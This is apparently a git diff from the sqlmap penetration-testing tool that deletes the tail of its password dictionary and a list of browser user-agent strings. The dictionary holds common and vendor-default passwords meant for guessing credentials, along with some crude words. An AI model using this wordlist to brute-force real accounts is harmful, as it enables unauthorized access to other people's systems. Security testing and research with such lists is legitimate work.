-sanfran
-sang
-sanity
-sanjose
-santa
-santafe
-santana
-santiago
-santos
-santoysena
-sap
-saphire
-sapper
-sapphire
-sapr3
-sara
-sarah
-sarah1
-saratoga
-sarita
-sasasa
-sascha
-sasha
-sasha1
-saskia
-sassy
-sassy1
-sasuke
-satan
-satan666
-satori
-saturday
-saturn
-Saturn
-saturn5
-sauron
-sausage
-sausages
-savage
-savanna
-savannah
-savior
-sawyer
-saxon
-sayang
-sbdc
-scamper
-scania
-scanner
-scarecrow
-scarface
-scarlet
-scarlett
-schalke
-schatz
-scheisse
-scheme
-schmidt
-schnapps
-school
-school1
-science
-scissors
-scooby
-scooby1
-scoobydo
-scoobydoo
-scooter
-scooter1
-score
-scorpio
-scorpio1
-scorpion
-scotch
-scotland
-scott
-scott1
-scottie
-scotty
-scout
-scouts
-scrabble
-scrapper
-scrappy
-scratch
-scream
-screamer
-screen
-screw
-screwy
-script
-scrooge
-scruffy
-scuba
-scuba1
-scully
-sdos_icsap
-seabee
-seadoo
-seagate
-seagull
-seahawks
-seamus
-sean
-searay
-search
-season
-seattle
-sebastia
-sebastian
-sebring
-secdemo
-second
-secret
-secret1
-secret3
-secrets
-secure
-security
-sedona
-seeker
-seeking
-seinfeld
-select
-selena
-selina
-seminole
-semper
-semperfi
-senator
-senators
-seneca
-seng
-senha
-senior
-senna
-sensei
-sensor
-sentinel
-seoul
-septembe
-september
-septiembre
-serega
-serena
-serenity
-sergeant
-sergei
-sergey
-sergio
-series
-serpent
-servando
-server
-service
-Service
-serviceconsumer1
-services
-sesame
-sestosant
-seven
-seven7
-sevens
-sex
-sex123
-sex4me
-sex69
-sexgod
-sexman
-sexo
-sexsex
-sexsexsex
-sexual
-sexx
-sexxx
-sexxxx
-sexxxy
-sexxy
-sexy
-sexy1
-sexy12
-sexy123
-sexy69
-sexybabe
-sexyboy
-sexygirl
-sexylady
-sexyman
-sexysexy
-seymour
-sf49ers
-sh
-shadow
-Shadow
-shadow1
-shadow12
-shadows
-shag
-shaggy
-shai
-shakira
-shalom
-shaman
-shampoo
-shamrock
-shamus
-shan
-shane
-shang
-shanghai
-shania
-shanna
-shannon
-shannon1
-shanny
-shanti
-shao
-shaolin
-sharc
-share
-shark
-sharks
-sharky
-sharon
-sharp
-shasta
-shauna
-shaved
-shawn
-shawna
-shayne
-shazam
-shearer
-sheba
-sheba1
-sheeba
-sheena
-sheep
-sheepdog
-sheffield
-shei
-sheila
-shelby
-sheldon
-shell
-shelley
-shelly
-shelter
-shelves
-shemale
-shen
-sheng
-shepherd
-sheridan
-sheriff
-sherlock
-sherman
-sherri
-sherry
-sherwood
-shibby
-shiloh
-shiner
-shinobi
-ship
-shirley
-shit
-shitface
-shithead
-shitty
-shiva
-shivers
-shock
-shocker
-shodan
-shoes
-shogun
-shojou
-shonuf
-shooter
-shopper
-shopping
-short
-shorty
-shorty1
-shotgun
-shou
-shovel
-show
-shower
-showme
-showtime
-shrimp
-shuai
-shuang
-shui
-shun
-shuo
-shuttle
-shutup
-shyshy
-sick
-sidekick
-Sidekick
-sidney
-siemens
-sierra
-Sierra
-sifra
-sifre
-sigma
-sigmachi
-signal
-signature
-si_informtn_schema
-silence
-silent
-silly
-silver
-silver1
-silverad
-silvia
-simba
-simba1
-simmons
-simon
-simon1
-simona
-simone
-simple
-simpson
-simpsons
-sims
-simsim
-sinatra
-sinbad
-sinclair
-sinegra
-singapor
-singer
-single
-sinister
-sinned
-sinner
-siobhan
-sirius
-sisma
-sissy
-sister
-sister12
-sisters
-site
-siteminder
-sites
-sithlord
-sixers
-sixpack
-sixsix
-sixty
-sixty9
-skate
-skater
-skater1
-skeeter
-Skeeter
-skibum
-skidoo
-skiing
-skillet
-skinhead
-skinner
-skinny
-skip
-skipper
-skipper1
-skippy
-skittles
-skull
-skunk
-skydive
-skyhawk
-skylar
-skylark
-skyler
-skyline
-skywalke
-skywalker
-slacker
-slamdunk
-slammer
-slapper
-slappy
-slapshot
-slaptazodis
-slater
-slave
-slave1
-slayer
-slayer1
-sleep
-sleeper
-sleepy
-slick
-slick1
-slidepw
-slider
-slim
-slimshad
-slinky
-slip
-slipknot
-slipknot1
-slipknot666
-slippery
-sloppy
-slowhand
-slugger
-sluggo
-slut
-sluts
-slutty
-smackdow
-small
-smart
-smart1
-smashing
-smeghead
-smegma
-smelly
-smile
-smile1
-smiles
-smiley
-smirnoff
-smith
-smiths
-smitty
-smoke
-smoke1
-smoker
-smokes
-smokey
-Smokey
-smokey1
-smokie
-smokin
-smoking
-smooch
-smooth
-smoothie
-smother
-smudge
-smurfy
-smut
-snake
-snake1
-snakes
-snapon
-snapper
-snapple
-snappy
-snatch
-sneakers
-sneaky
-snicker
-snickers
-sniffing
-sniper
-snooker
-snoop
-snoopdog
-snoopy
-Snoopy
-snoopy1
-snow
-snowball
-snowbird
-snowboar
-snowboard
-snowfall
-snowflak
-snowflake
-snowman
-snowski
-snuffy
-snuggles
-soap
-sober1
-soccer
-soccer1
-soccer10
-soccer12
-soccer2
-socrates
-softail
-softball
-software
-solaris
-soldier
-soledad
-soleil
-solitude
-solo
-solomon
-solution
-some
-somebody
-someday
-someone
-somerset
-somethin
-something
-sommer
-sonata
-sondra
-song
-sonia
-sonic
-sonics
-sonny
-sonoma
-sonrisa
-sony
-sonya
-sonyfuck
-sonysony
-sooner
-sooners
-sophia
-sophie
-soprano
-sossina
-soto
-soul
-soulmate
-sound
-south
-southern
-southpar
-southpark
-southpaw
-southside1
-sowhat
-soyhermosa
-space
-spaceman
-spain
-spam
-spanish
-spank
-spanker
-spanking
-spankme
-spanky
-spanner
-sparkle
-sparkles
-sparks
-sparky
-Sparky
-sparky1
-sparrow
-sparrows
-sparta
-spartan
-spartan1
-spartans
-spawn
-spazz
-speaker
-speakers
-spears
-special
-specialk
-spectre
-spectrum
-speed
-speedo
-speedway
-speedy
-Speedy
-spence
-spencer
-spencer1
-sperma
-sphinx
-sphynx
-spice
-spider
-spider1
-spiderma
-spiderman
-spiderman1
-spidey
-spierson
-spike
-spike1
-spiker
-spikes
-spikey
-spinner
-spiral
-spirit
-spit
-spitfire
-splash
-spliff
-splinter
-spock
-spoiled
-sponge
-spongebo
-spongebob
-spongebob1
-spooge
-spooky
-spoon
-spoons
-sport
-sporting
-sports
-sporty
-spot
-spotty
-spread
-spring
-springer
-springs
-sprint
-sprinter
-sprite
-sprocket
-sprout
-spud
-spunky
-spurs
-spurs1
-sputnik
-spyder
-sql
-sqlexec
-squall
-square
-squash
-squeak
-squeeze
-squires
-squirrel
-squirt
-srinivas
-ssp
-sss
-ssss
-sssss
-ssssss
-sssssss
-ssssssss
-stacey
-staci
-stacie
-stacy
-stafford
-stalin
-stalker
-stallion
-stan
-standard
-stanford
-stang
-stanley
-staples
-star
-star69
-starbuck
-starcraf
-starcraft
-stardust
-starfire
-starfish
-stargate
-starligh
-starlight
-starman
-starr
-stars
-starship
-starstar
-start
-start1
-starter
-startfinding
-startrek
-starwars
-starwars1
-state
-static
-station
-status
-Status
-stayout
-stealth
-steel
-steele
-steeler
-steelers
-steelers1
-stefan
-stefanie
-stefano
-steffen
-steffi
-stella
-stellar
-steph
-steph1
-stephan
-stephane
-stephani
-stephanie
-stephanie1
-stephen
-stephen1
-stephi
-stereo
-sterling
-Sterling
-steve
-steve1
-steven
-Steven
-steven1
-stevens
-stevie
-stewart
-stick
-stickman
-sticks
-sticky
-stiffy
-stimpy
-sting
-sting1
-stinger
-stingray
-stinker
-stinky
-stivers
-stock
-stocking
-stocks
-stockton
-stolen
-stone
-stone1
-stonecol
-stonecold
-stoned
-stoner
-stones
-stoney
-stop
-storage
-store
-stories
-storm
-storm1
-stormy
-straight
-strange
-stranger
-strangle
-strap
-strat
-stratford
-strato
-strat_passwd
-stratus
-strawber
-strawberry
-stream
-streaming
-street
-streets
-strength
-stress
-stretch
-strider
-strike
-striker
-string
-strip
-stripper
-stroke
-stroker
-strong
-stryker
-stuart
-stubby
-stud
-student
-student2
-studio
-studly
-studman
-stuff
-stumpy
-stunner
-stupid
-stupid1
-stuttgart
-style
-styles
-stylus
-suan
-subaru
-sublime
-submit
-suburban
-subway
-subzero
-success
-success1
-suck
-suckdick
-sucked
-sucker
-suckers
-sucking
-suckit
-suckme
-sucks
-sudoku
-sue
-sugar
-sugar1
-suicide
-sullivan
-sultan
-summer
-Summer
-summer1
-summer69
-summer99
-summers
-summit
-sumuinen
-sun
-sunbird
-sundance
-sunday
-sundevil
-sunfire
-sunflowe
-sunflower
-sunlight
-sunny
-sunny1
-sunnyday
-sunrise
-sunset
-sunshine
-Sunshine
-sunshine1
-super
-super1
-super123
-superb
-superfly
-superior
-superman
-Superman
-superman1
-supernov
-supersecret
-supersta
-superstage
-superstar
-superuser
-supervisor
-support
-supported
-supra
-supreme
-surf
-surfer
-surfing
-survivor
-susan
-susan1
-susana
-susanna
-susanne
-sushi
-susie
-sutton
-suzanne
-suzie
-suzuki
-suzy
-Sverige
-svetlana
-swallow
-swanson
-swearer
-sweden
-swedish
-sweet
-sweet1
-sweetheart
-sweetie
-sweetnes
-sweetness
-sweetpea
-sweets
-sweety
-swim
-swimmer
-swimming
-swinger
-swingers
-swinging
-switch
-switzer
-swoosh
-Swoosh
-sword
-swordfis
-swordfish
-swords
-swpro
-swuser
-sybil
-sydney
-sylveste
-sylvester
-sylvia
-sylvie
-symbol
-symmetry
-sympa
-synergy
-synthimatiko
-syracuse
-sys
-sysadm
-sysadmin
-sysman
-syspass
-sys_stnt
-system
-system5
-systempass
-systems
-syzygy
-tab
-tabasco
-tabatha
-tabitha
-taco
-tacobell
-tacoma
-taffy
-tahiti
-taiwan
-talbot
-talisman
-talks
-talon
-tamara
-tami
-tamie
-tammy
-tamtam
-tang
-tangerine
-tango
-tank
-tanker
-tanner
-tantra
-tanya
-tanya1
-tapani
-tape
-tara
-tardis
-targas
-target
-target123
-tarheel
-tarheels
-tarpon
-tarragon
-tartar
-tarzan
-tasha
-tasha1
-tata
-tatiana
-tattoo
-taurus
-Taurus
-taxman
-taylor
-Taylor
-taylor1
-tazdevil
-tazman
-tazmania
-tbird
-t-bone
-tbone
-tdos_icsap
-teacher
-team
-tech
-technics
-techno
-tectec
-teddy
-teddy1
-teddybea
-teddybear
-teen
-teenage
-teens
-teflon
-tekila
-tekken
-Telechargement
-telecom
-telefon
-telefono
-telephon
-telephone
-temp
-temp!
-temp123
-tempest
-templar
-temple
-temporal
-temporary
-temppass
-temptation
-temptemp
-tenchi
-tender
-tenerife
-teng
-tennesse
-tennis
-Tennis
-tequiero
-tequila
-terefon
-teresa
-terminal
-terminat
-terminator
-terra
-terrapin
-terrell
-terror
-terry
-terry1
-test
-test!
-test1
-test12
-test123
-test1234
-test2
-test3
-tester
-testi
-testing
-testing1
-testpass
-testpilot
-testtest
-test_user
-tetsuo
-texas
-texas1
-thailand
-thanatos
-thanks
-thankyou
-the
-theater
-theatre
-thebear
-thebest
-theboss
-thecat
-thecrow
-thecure
-thedog
-thedon
-thedoors
-thedude
-theend
-theforce
-thegame
-thegreat
-their
-thejudge
-thekid
-theking
-thelma
-thelorax
-theman
-theodore
-theone
-there
-theresa
-Theresa
-therock
-therock1
-these
-thesims
-thethe
-thewho
-thierry
-thing
-thinsamplepw
-thirteen
-this
-thisisit
-thomas
-Thomas
-thomas1
-thompson
-thong
-thongs
-thor
-thorne
-thrasher
-three
-threesom
-throat
-thuglife
-thumb
-thumbs
-thumper
-thunder
-Thunder
-thunder1
-thunderb
-thunderbird
-thursday
-thx1138
-tian
-tiao
-tibco
-tiberius
-tiburon
-ticket
-tickle
-tierno
-tiffany
-tiffany1
-tiger
-tiger1
-tiger123
-tiger2
-tigercat
-tigers
-tigers1
-tigger
-Tigger
-tigger1
-tigger2
-tight
-tightend
-tights
-tigre
-tika
-tim
-timber
-time
-timeout
-timmy
-timosha
-timosha123
-timothy
-timtim
-tina
-ting
-tinker
-tinkerbe
-tinkerbell
-tinkle
-tinman
-tintin
-tiny
-tip37
-tipper
-titan
-titanic
-titanium
-titans
-titimaman
-titleist
-titouf59
-tits
-titten
-titts
-titty
-tivoli
-tnt
-toast
-toaster
-tobias
-toby
-today
-todd
-toejam
-toffee
-together
-toggle
-toilet
-tokyo
-toledo
-tolkien
-tom
-tomahawk
-tomas
-tomato
-tomcat
-tommie
-tommy
-tommy1
-tommyboy
-tomorrow
-tomtom
-tong
-tongue
-tonight
-tony
-toocool
-tool
-toolbox
-toolman
-toon
-toonarmy
-tootie
-tootsie
-topcat
-topdog
-topgun
-tophat
-topher
-topography
-topper
-toriamos
-torino
-tornado
-toronto
-torpedo
-torres
-tortoise
-toshiba
-tosser
-total
-toto
-toto1
-tototo
-tottenha
-tottenham
-toucan
-touching
-tower
-towers
-town
-toxic
-toyota
-trace
-tracer
-tracey
-traci
-tracie
-track
-tracker
-tractor
-tracy
-trader
-traffic
-trailer
-trails
-train
-trainer
-training
-trains
-trance
-tranny
-trans
-transam
-transfer
-transit
-transport
-trapper
-trash
-trauma
-travel
-traveler
-travis
-tre
-treasure
-treble
-trebor
-tree
-treefrog
-trees
-treetop
-trek
-trevor
-trial
-triangle
-tribal
-tricia
-tricky
-trident
-trigger
-trinidad
-trinitro
-trinity
-trip
-triple
-tripleh
-tripod
-tripper
-trish
-trisha
-tristan
-triton
-triumph
-trivial
-trixie
-trojan
-trojans
-troll
-trombone
-trooper
-trophy
-tropical
-trouble
-trouble1
-trout
-troy
-truck
-trucker
-trucking
-trucks
-truelove
-truman
-trumpet
-trunks
-trust
-trustme
-trustno1
-truth
-tsdev
-tsunami
-tsuser
-tttttt
-tttttttt
-tty
-tuan
-tubas
-tucker
-tucson
-tudelft
-tuesday
-Tuesday
-tula
-tulips
-tuna
-tunafish
-tundra
-tunnussana
-tupac
-turbine
-turbo
-turbo1
-turbo2
-turkey
-turner
-turnip
-turtle
-tuscl
-tuttle
-tweety
-tweety1
-twelve
-twenty
-twiggy
-twilight
-twinkie
-twinkle
-twins
-twisted
-twister
-twitter
-tybnoq
-tycoon
-tyler
-tyler1
-typhoon
-tyrone
-tyson
-tyson1
-ultima
-ultimate
-ultra
-um_admin
-umbrella
-um_client
-umesh
-umpire
-undead
-underdog
-undertak
-undertaker
-underworld
-unhappy
-unicorn
-unicornio
-unique
-united
-unity
-universa
-universal
-universe
-universidad
-university
-unix
-unknown
-unreal
-upsilon
-uptown
-upyours
-uranus
-urchin
-ursula
-usa123
-usarmy
-user
-user0
-user1
-user2
-user3
-user4
-user5
-user6
-user7
-user8
-user9
-username
-usmarine
-usmc
-usnavy
-Usuckballz1
-util
-utility
-utlestat
-utopia
-uucp
-uuuuuu
-vacation
-vader
-vader1
-vagabond
-vagina
-val
-valencia
-valentin
-valentina
-valentinchoque
-valentine
-valeria
-valerie
-valeverga
-valhalla
-valkyrie
-valley
-vampire
-vampires
-vancouve
-vanessa
-vanessa1
-vanguard
-vanhalen
-vanilla
-vasant
-vauxhall
-vea
-vector
-vectra
-vedder
-vegas
-vegeta
-vegitto
-veh
-velo
-velocity
-velvet
-venice
-venom
-ventura
-venture
-venus
-veracruz
-verbatim
-veritas
-verizon
-vermont
-vernon
-Vernon
-verona
-veronica
-veronika
-versace
-vertex_login
-vertigo
-vette
-vfhbyf
-vfrcbv
-vh5150
-viagra
-vicki
-vickie
-vicky
-victor
-victor1
-victoria
-Victoria
-victoria1
-victory
-video
-videouser
-vienna
-vietnam
-viewsoni
-vif_dev_pwd
-viking
-vikings
-vikings1
-vikram
-villa
-village
-vincent
-Vincent
-vincent1
-vinnie
-vintage
-violet
-violin
-viper
-viper1
-vipergts
-vipers
-virago
-virgil
-virgin
-virginia
-virginie
-virtual
-virus
-viruser
-visa
-vision
-visitor
-visual
-vivian
-vladimir
-vodka
-volcano
-volcom
-volkswag
-volley
-volleyba
-volume
-volvo
-voodoo
-vortex
-voyager
-voyager1
-voyeur
-vrr1
-vrr2
-vsegda
-vulcan
-vvvv
-vvvvvv
-wachtwoord
-wachtwurd
-waffle
-wagner
-wagwoord
-waiting
-walden
-waldo
-walker
-wallace
-wall.e
-wallet
-walleye
-wally
-walmart
-walnut
-walrus
-walter
-walton
-wanderer
-wang
-wanker
-wanking
-wanted
-warcraft
-wareagle
-warez
-wargames
-warhamme
-warlock
-warlord
-warner
-warning
-warren
-warrior
-warrior1
-warriors
-warthog
-wasabi
-washburn
-washingt
-washington
-wasser
-wassup
-wasted
-watch
-watcher
-water
-water1
-waterboy
-waterloo
-Waterloo
-waters
-watford
-watson
-wayne
-wayne1
-wealth
-wearing
-weasel
-weather
-weaver
-web
-webber
-webcal01
-webdb
-webmaste
-webmaster
-webread
-webster
-Webster
-wedding
-wedge
-weed
-weed420
-weekend
-weenie
-weezer
-weiner
-weird
-welcome
-welcome1
-welcome123
-welder
-wendi
-wendy
-wendy1
-weng
-werder
-werdna
-werewolf
-werner
-wert
-wesley
-west
-western
-westham
-weston
-westside
-westwood
-wetpussy
-wetter
-wfadmin
-wg8e3wjf
-wh
-whale1
-what
-whatever
-whatever1
-whatnot
-whatsup
-whatthe
-whatwhat
-wheels
-whiplash
-whiskers
-whiskey
-whisky
-whisper
-whistler
-whit
-white
-white1
-whiteboy
-whiteout
-whitesox
-whitey
-whiting
-whitney
-whocares
-wholesale
-whore
-whoville
-whynot
-wibble
-wicked
-widget
-wiesenhof
-wifey
-wilbur
-wild
-wildbill
-wildcard
-wildcat
-wildcats
-wilder
-wildfire
-wildman
-wildone
-wildwood
-will
-william
-william1
-williams
-williamsburg
-willie
-willis
-willow
-Willow
-willy
-wilma
-wilson
-win95
-wind
-windmill
-window
-windows
-Windows
-windsor
-windsurf
-winger
-wingman
-wingnut
-wings
-winner
-winner1
-winners
-winnie
-Winnie
-winniethepooh
-winona
-winston
-winston1
-winter
-winter1
-wip
-wireless
-wisconsin
-wisdom
-wiseguy
-wishbone
-wives
-wizard
-wizard1
-wizards
-wkadmin
-wkproxy
-wksys
-wk_test
-wkuser
-wms
-wmsys
-woaini
-wob
-wolf
-wolf1
-wolf359
-wolfen
-wolfgang
-wolfie
-wolfman
-wolfpac
-wolfpack
-wolverin
-wolverine
-Wolverine
-wolves
-woman
-wombat
-wombat1
-women
-wonder
-wonderboy
-wood
-woodie
-woodland
-Woodrow
-woodstoc
-woodwind
-woody
-woody1
-woofer
-woofwoof
-woohoo
-wookie
-woowoo
-word
-wordpass
-wordup
-work
-work123
-working
-workout
-world
-World
-wormwood
-worship
-worthy
-wow12345
-wowwow
-wps
-wraith
-wrangler
-wrench
-wrestle
-wrestler
-wrestlin
-wrestling
-wright
-wrinkle1
-writer
-writing
-wsh
-wsm
-wutang
-www
-wwwuser
-wwww
-wwwwww
-wwwwwww
-wwwwwwww
-wxcvbn
-wyoming
-xademo
-xanadu
-xander
-xanth
-xavier
-xbox360
-xcountry
-xdp
-xerxes
-xfer
-x-files
-xfiles
-xian
-xiang
-xiao
-ximena
-ximenita
-xing
-xiong
-xla
-x-men
-xmodem
-xnc
-xni
-xnm
-xnp
-xns
-xprt
-xtr
-xtreme
-xuan
-xxx
-xxx123
-xxxx
-xxxxx
-xxxxxx
-xxxxxxx
-xxxxxxxx
-xyz
-xyz123
-xyzzy
-y
-yaco
-yamaha
-yamahar1
-yamato
-yang
-yankee
-yankees
-yankees1
-yankees2
-yasmin
-yaya
-yeah
-yeahbaby
-yellow
-yellow1
-yellowstone
-yes
-yeshua
-yessir
-yesyes
-yfnfif
-ying
-yoda
-yogibear
-yolanda
-yomama
-yong
-yosemite
-yoteamo
-youbye123
-young
-young1
-yourmom
-yourmom1
-your_pass
-yousuck
-yoyo
-yoyoma
-yoyoyo
-ysrmma
-ytrewq
-yuan
-yukon
-yummy
-yumyum
-yvette
-yvonne
-yyyy
-yyyyyy
-yyyyyyyy
-yzerman
-z123456
-zachary
-zachary1
-zack
-zag12wsx
-zander
-zang
-zanzibar
-zap
-zapata
-zapato
-zaphod
-zappa
-zapper
-zaq123
-zaq12wsx
-zaq1xsw2
-zaqwsx
-zaqxsw
-zebra
-zebras
-zeng
-zenith
-zephyr
-zeppelin
-zepplin
-zero
-zerocool
-zeus
-zhai
-zhang
-zhao
-zhei
-zheng
-zhong
-zhongguo
-zhou
-zhuai
-zhuang
-zhui
-zhun
-zhuo
-zidane
-ziggy
-zigzag
-zildjian
-zimmerman
-zipper
-zippo
-zippy
-zirtaeb
-zk.:
-zmodem
-zodiac
-zoltan
-zombie
-zong
-zoomer
-zoosk
-zorro
-zouzou
-zuan
-zwerg
-zxc
-zxc123
-zxccxz
-zxcv
-zxcvb
-Zxcvb
-zxcvbn
-zxcvbnm
-Zxcvbnm
-zxcvbnm1
-zxcvbnm123
-zxcxz
-zxczxc
-zxzxzx
-zzz
-zzzxxx
-zzzz
-zzzzz
-zzzzzz
-zzzzzzz
-zzzzzzzz
diff --git a/data/txt/user-agents.txt b/data/txt/user-agents.txt
deleted file mode 100644
index 581da9ef816..00000000000
--- a/data/txt/user-agents.txt
+++ /dev/null
@@ -1,190 +0,0 @@
-# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
-# See the file 'LICENSE' for copying permission
-
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.33 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.155 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko)
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/139 Version/11.1.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/139 Version/16.0 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/18.6
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.13 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.14 Safari/605.1.15
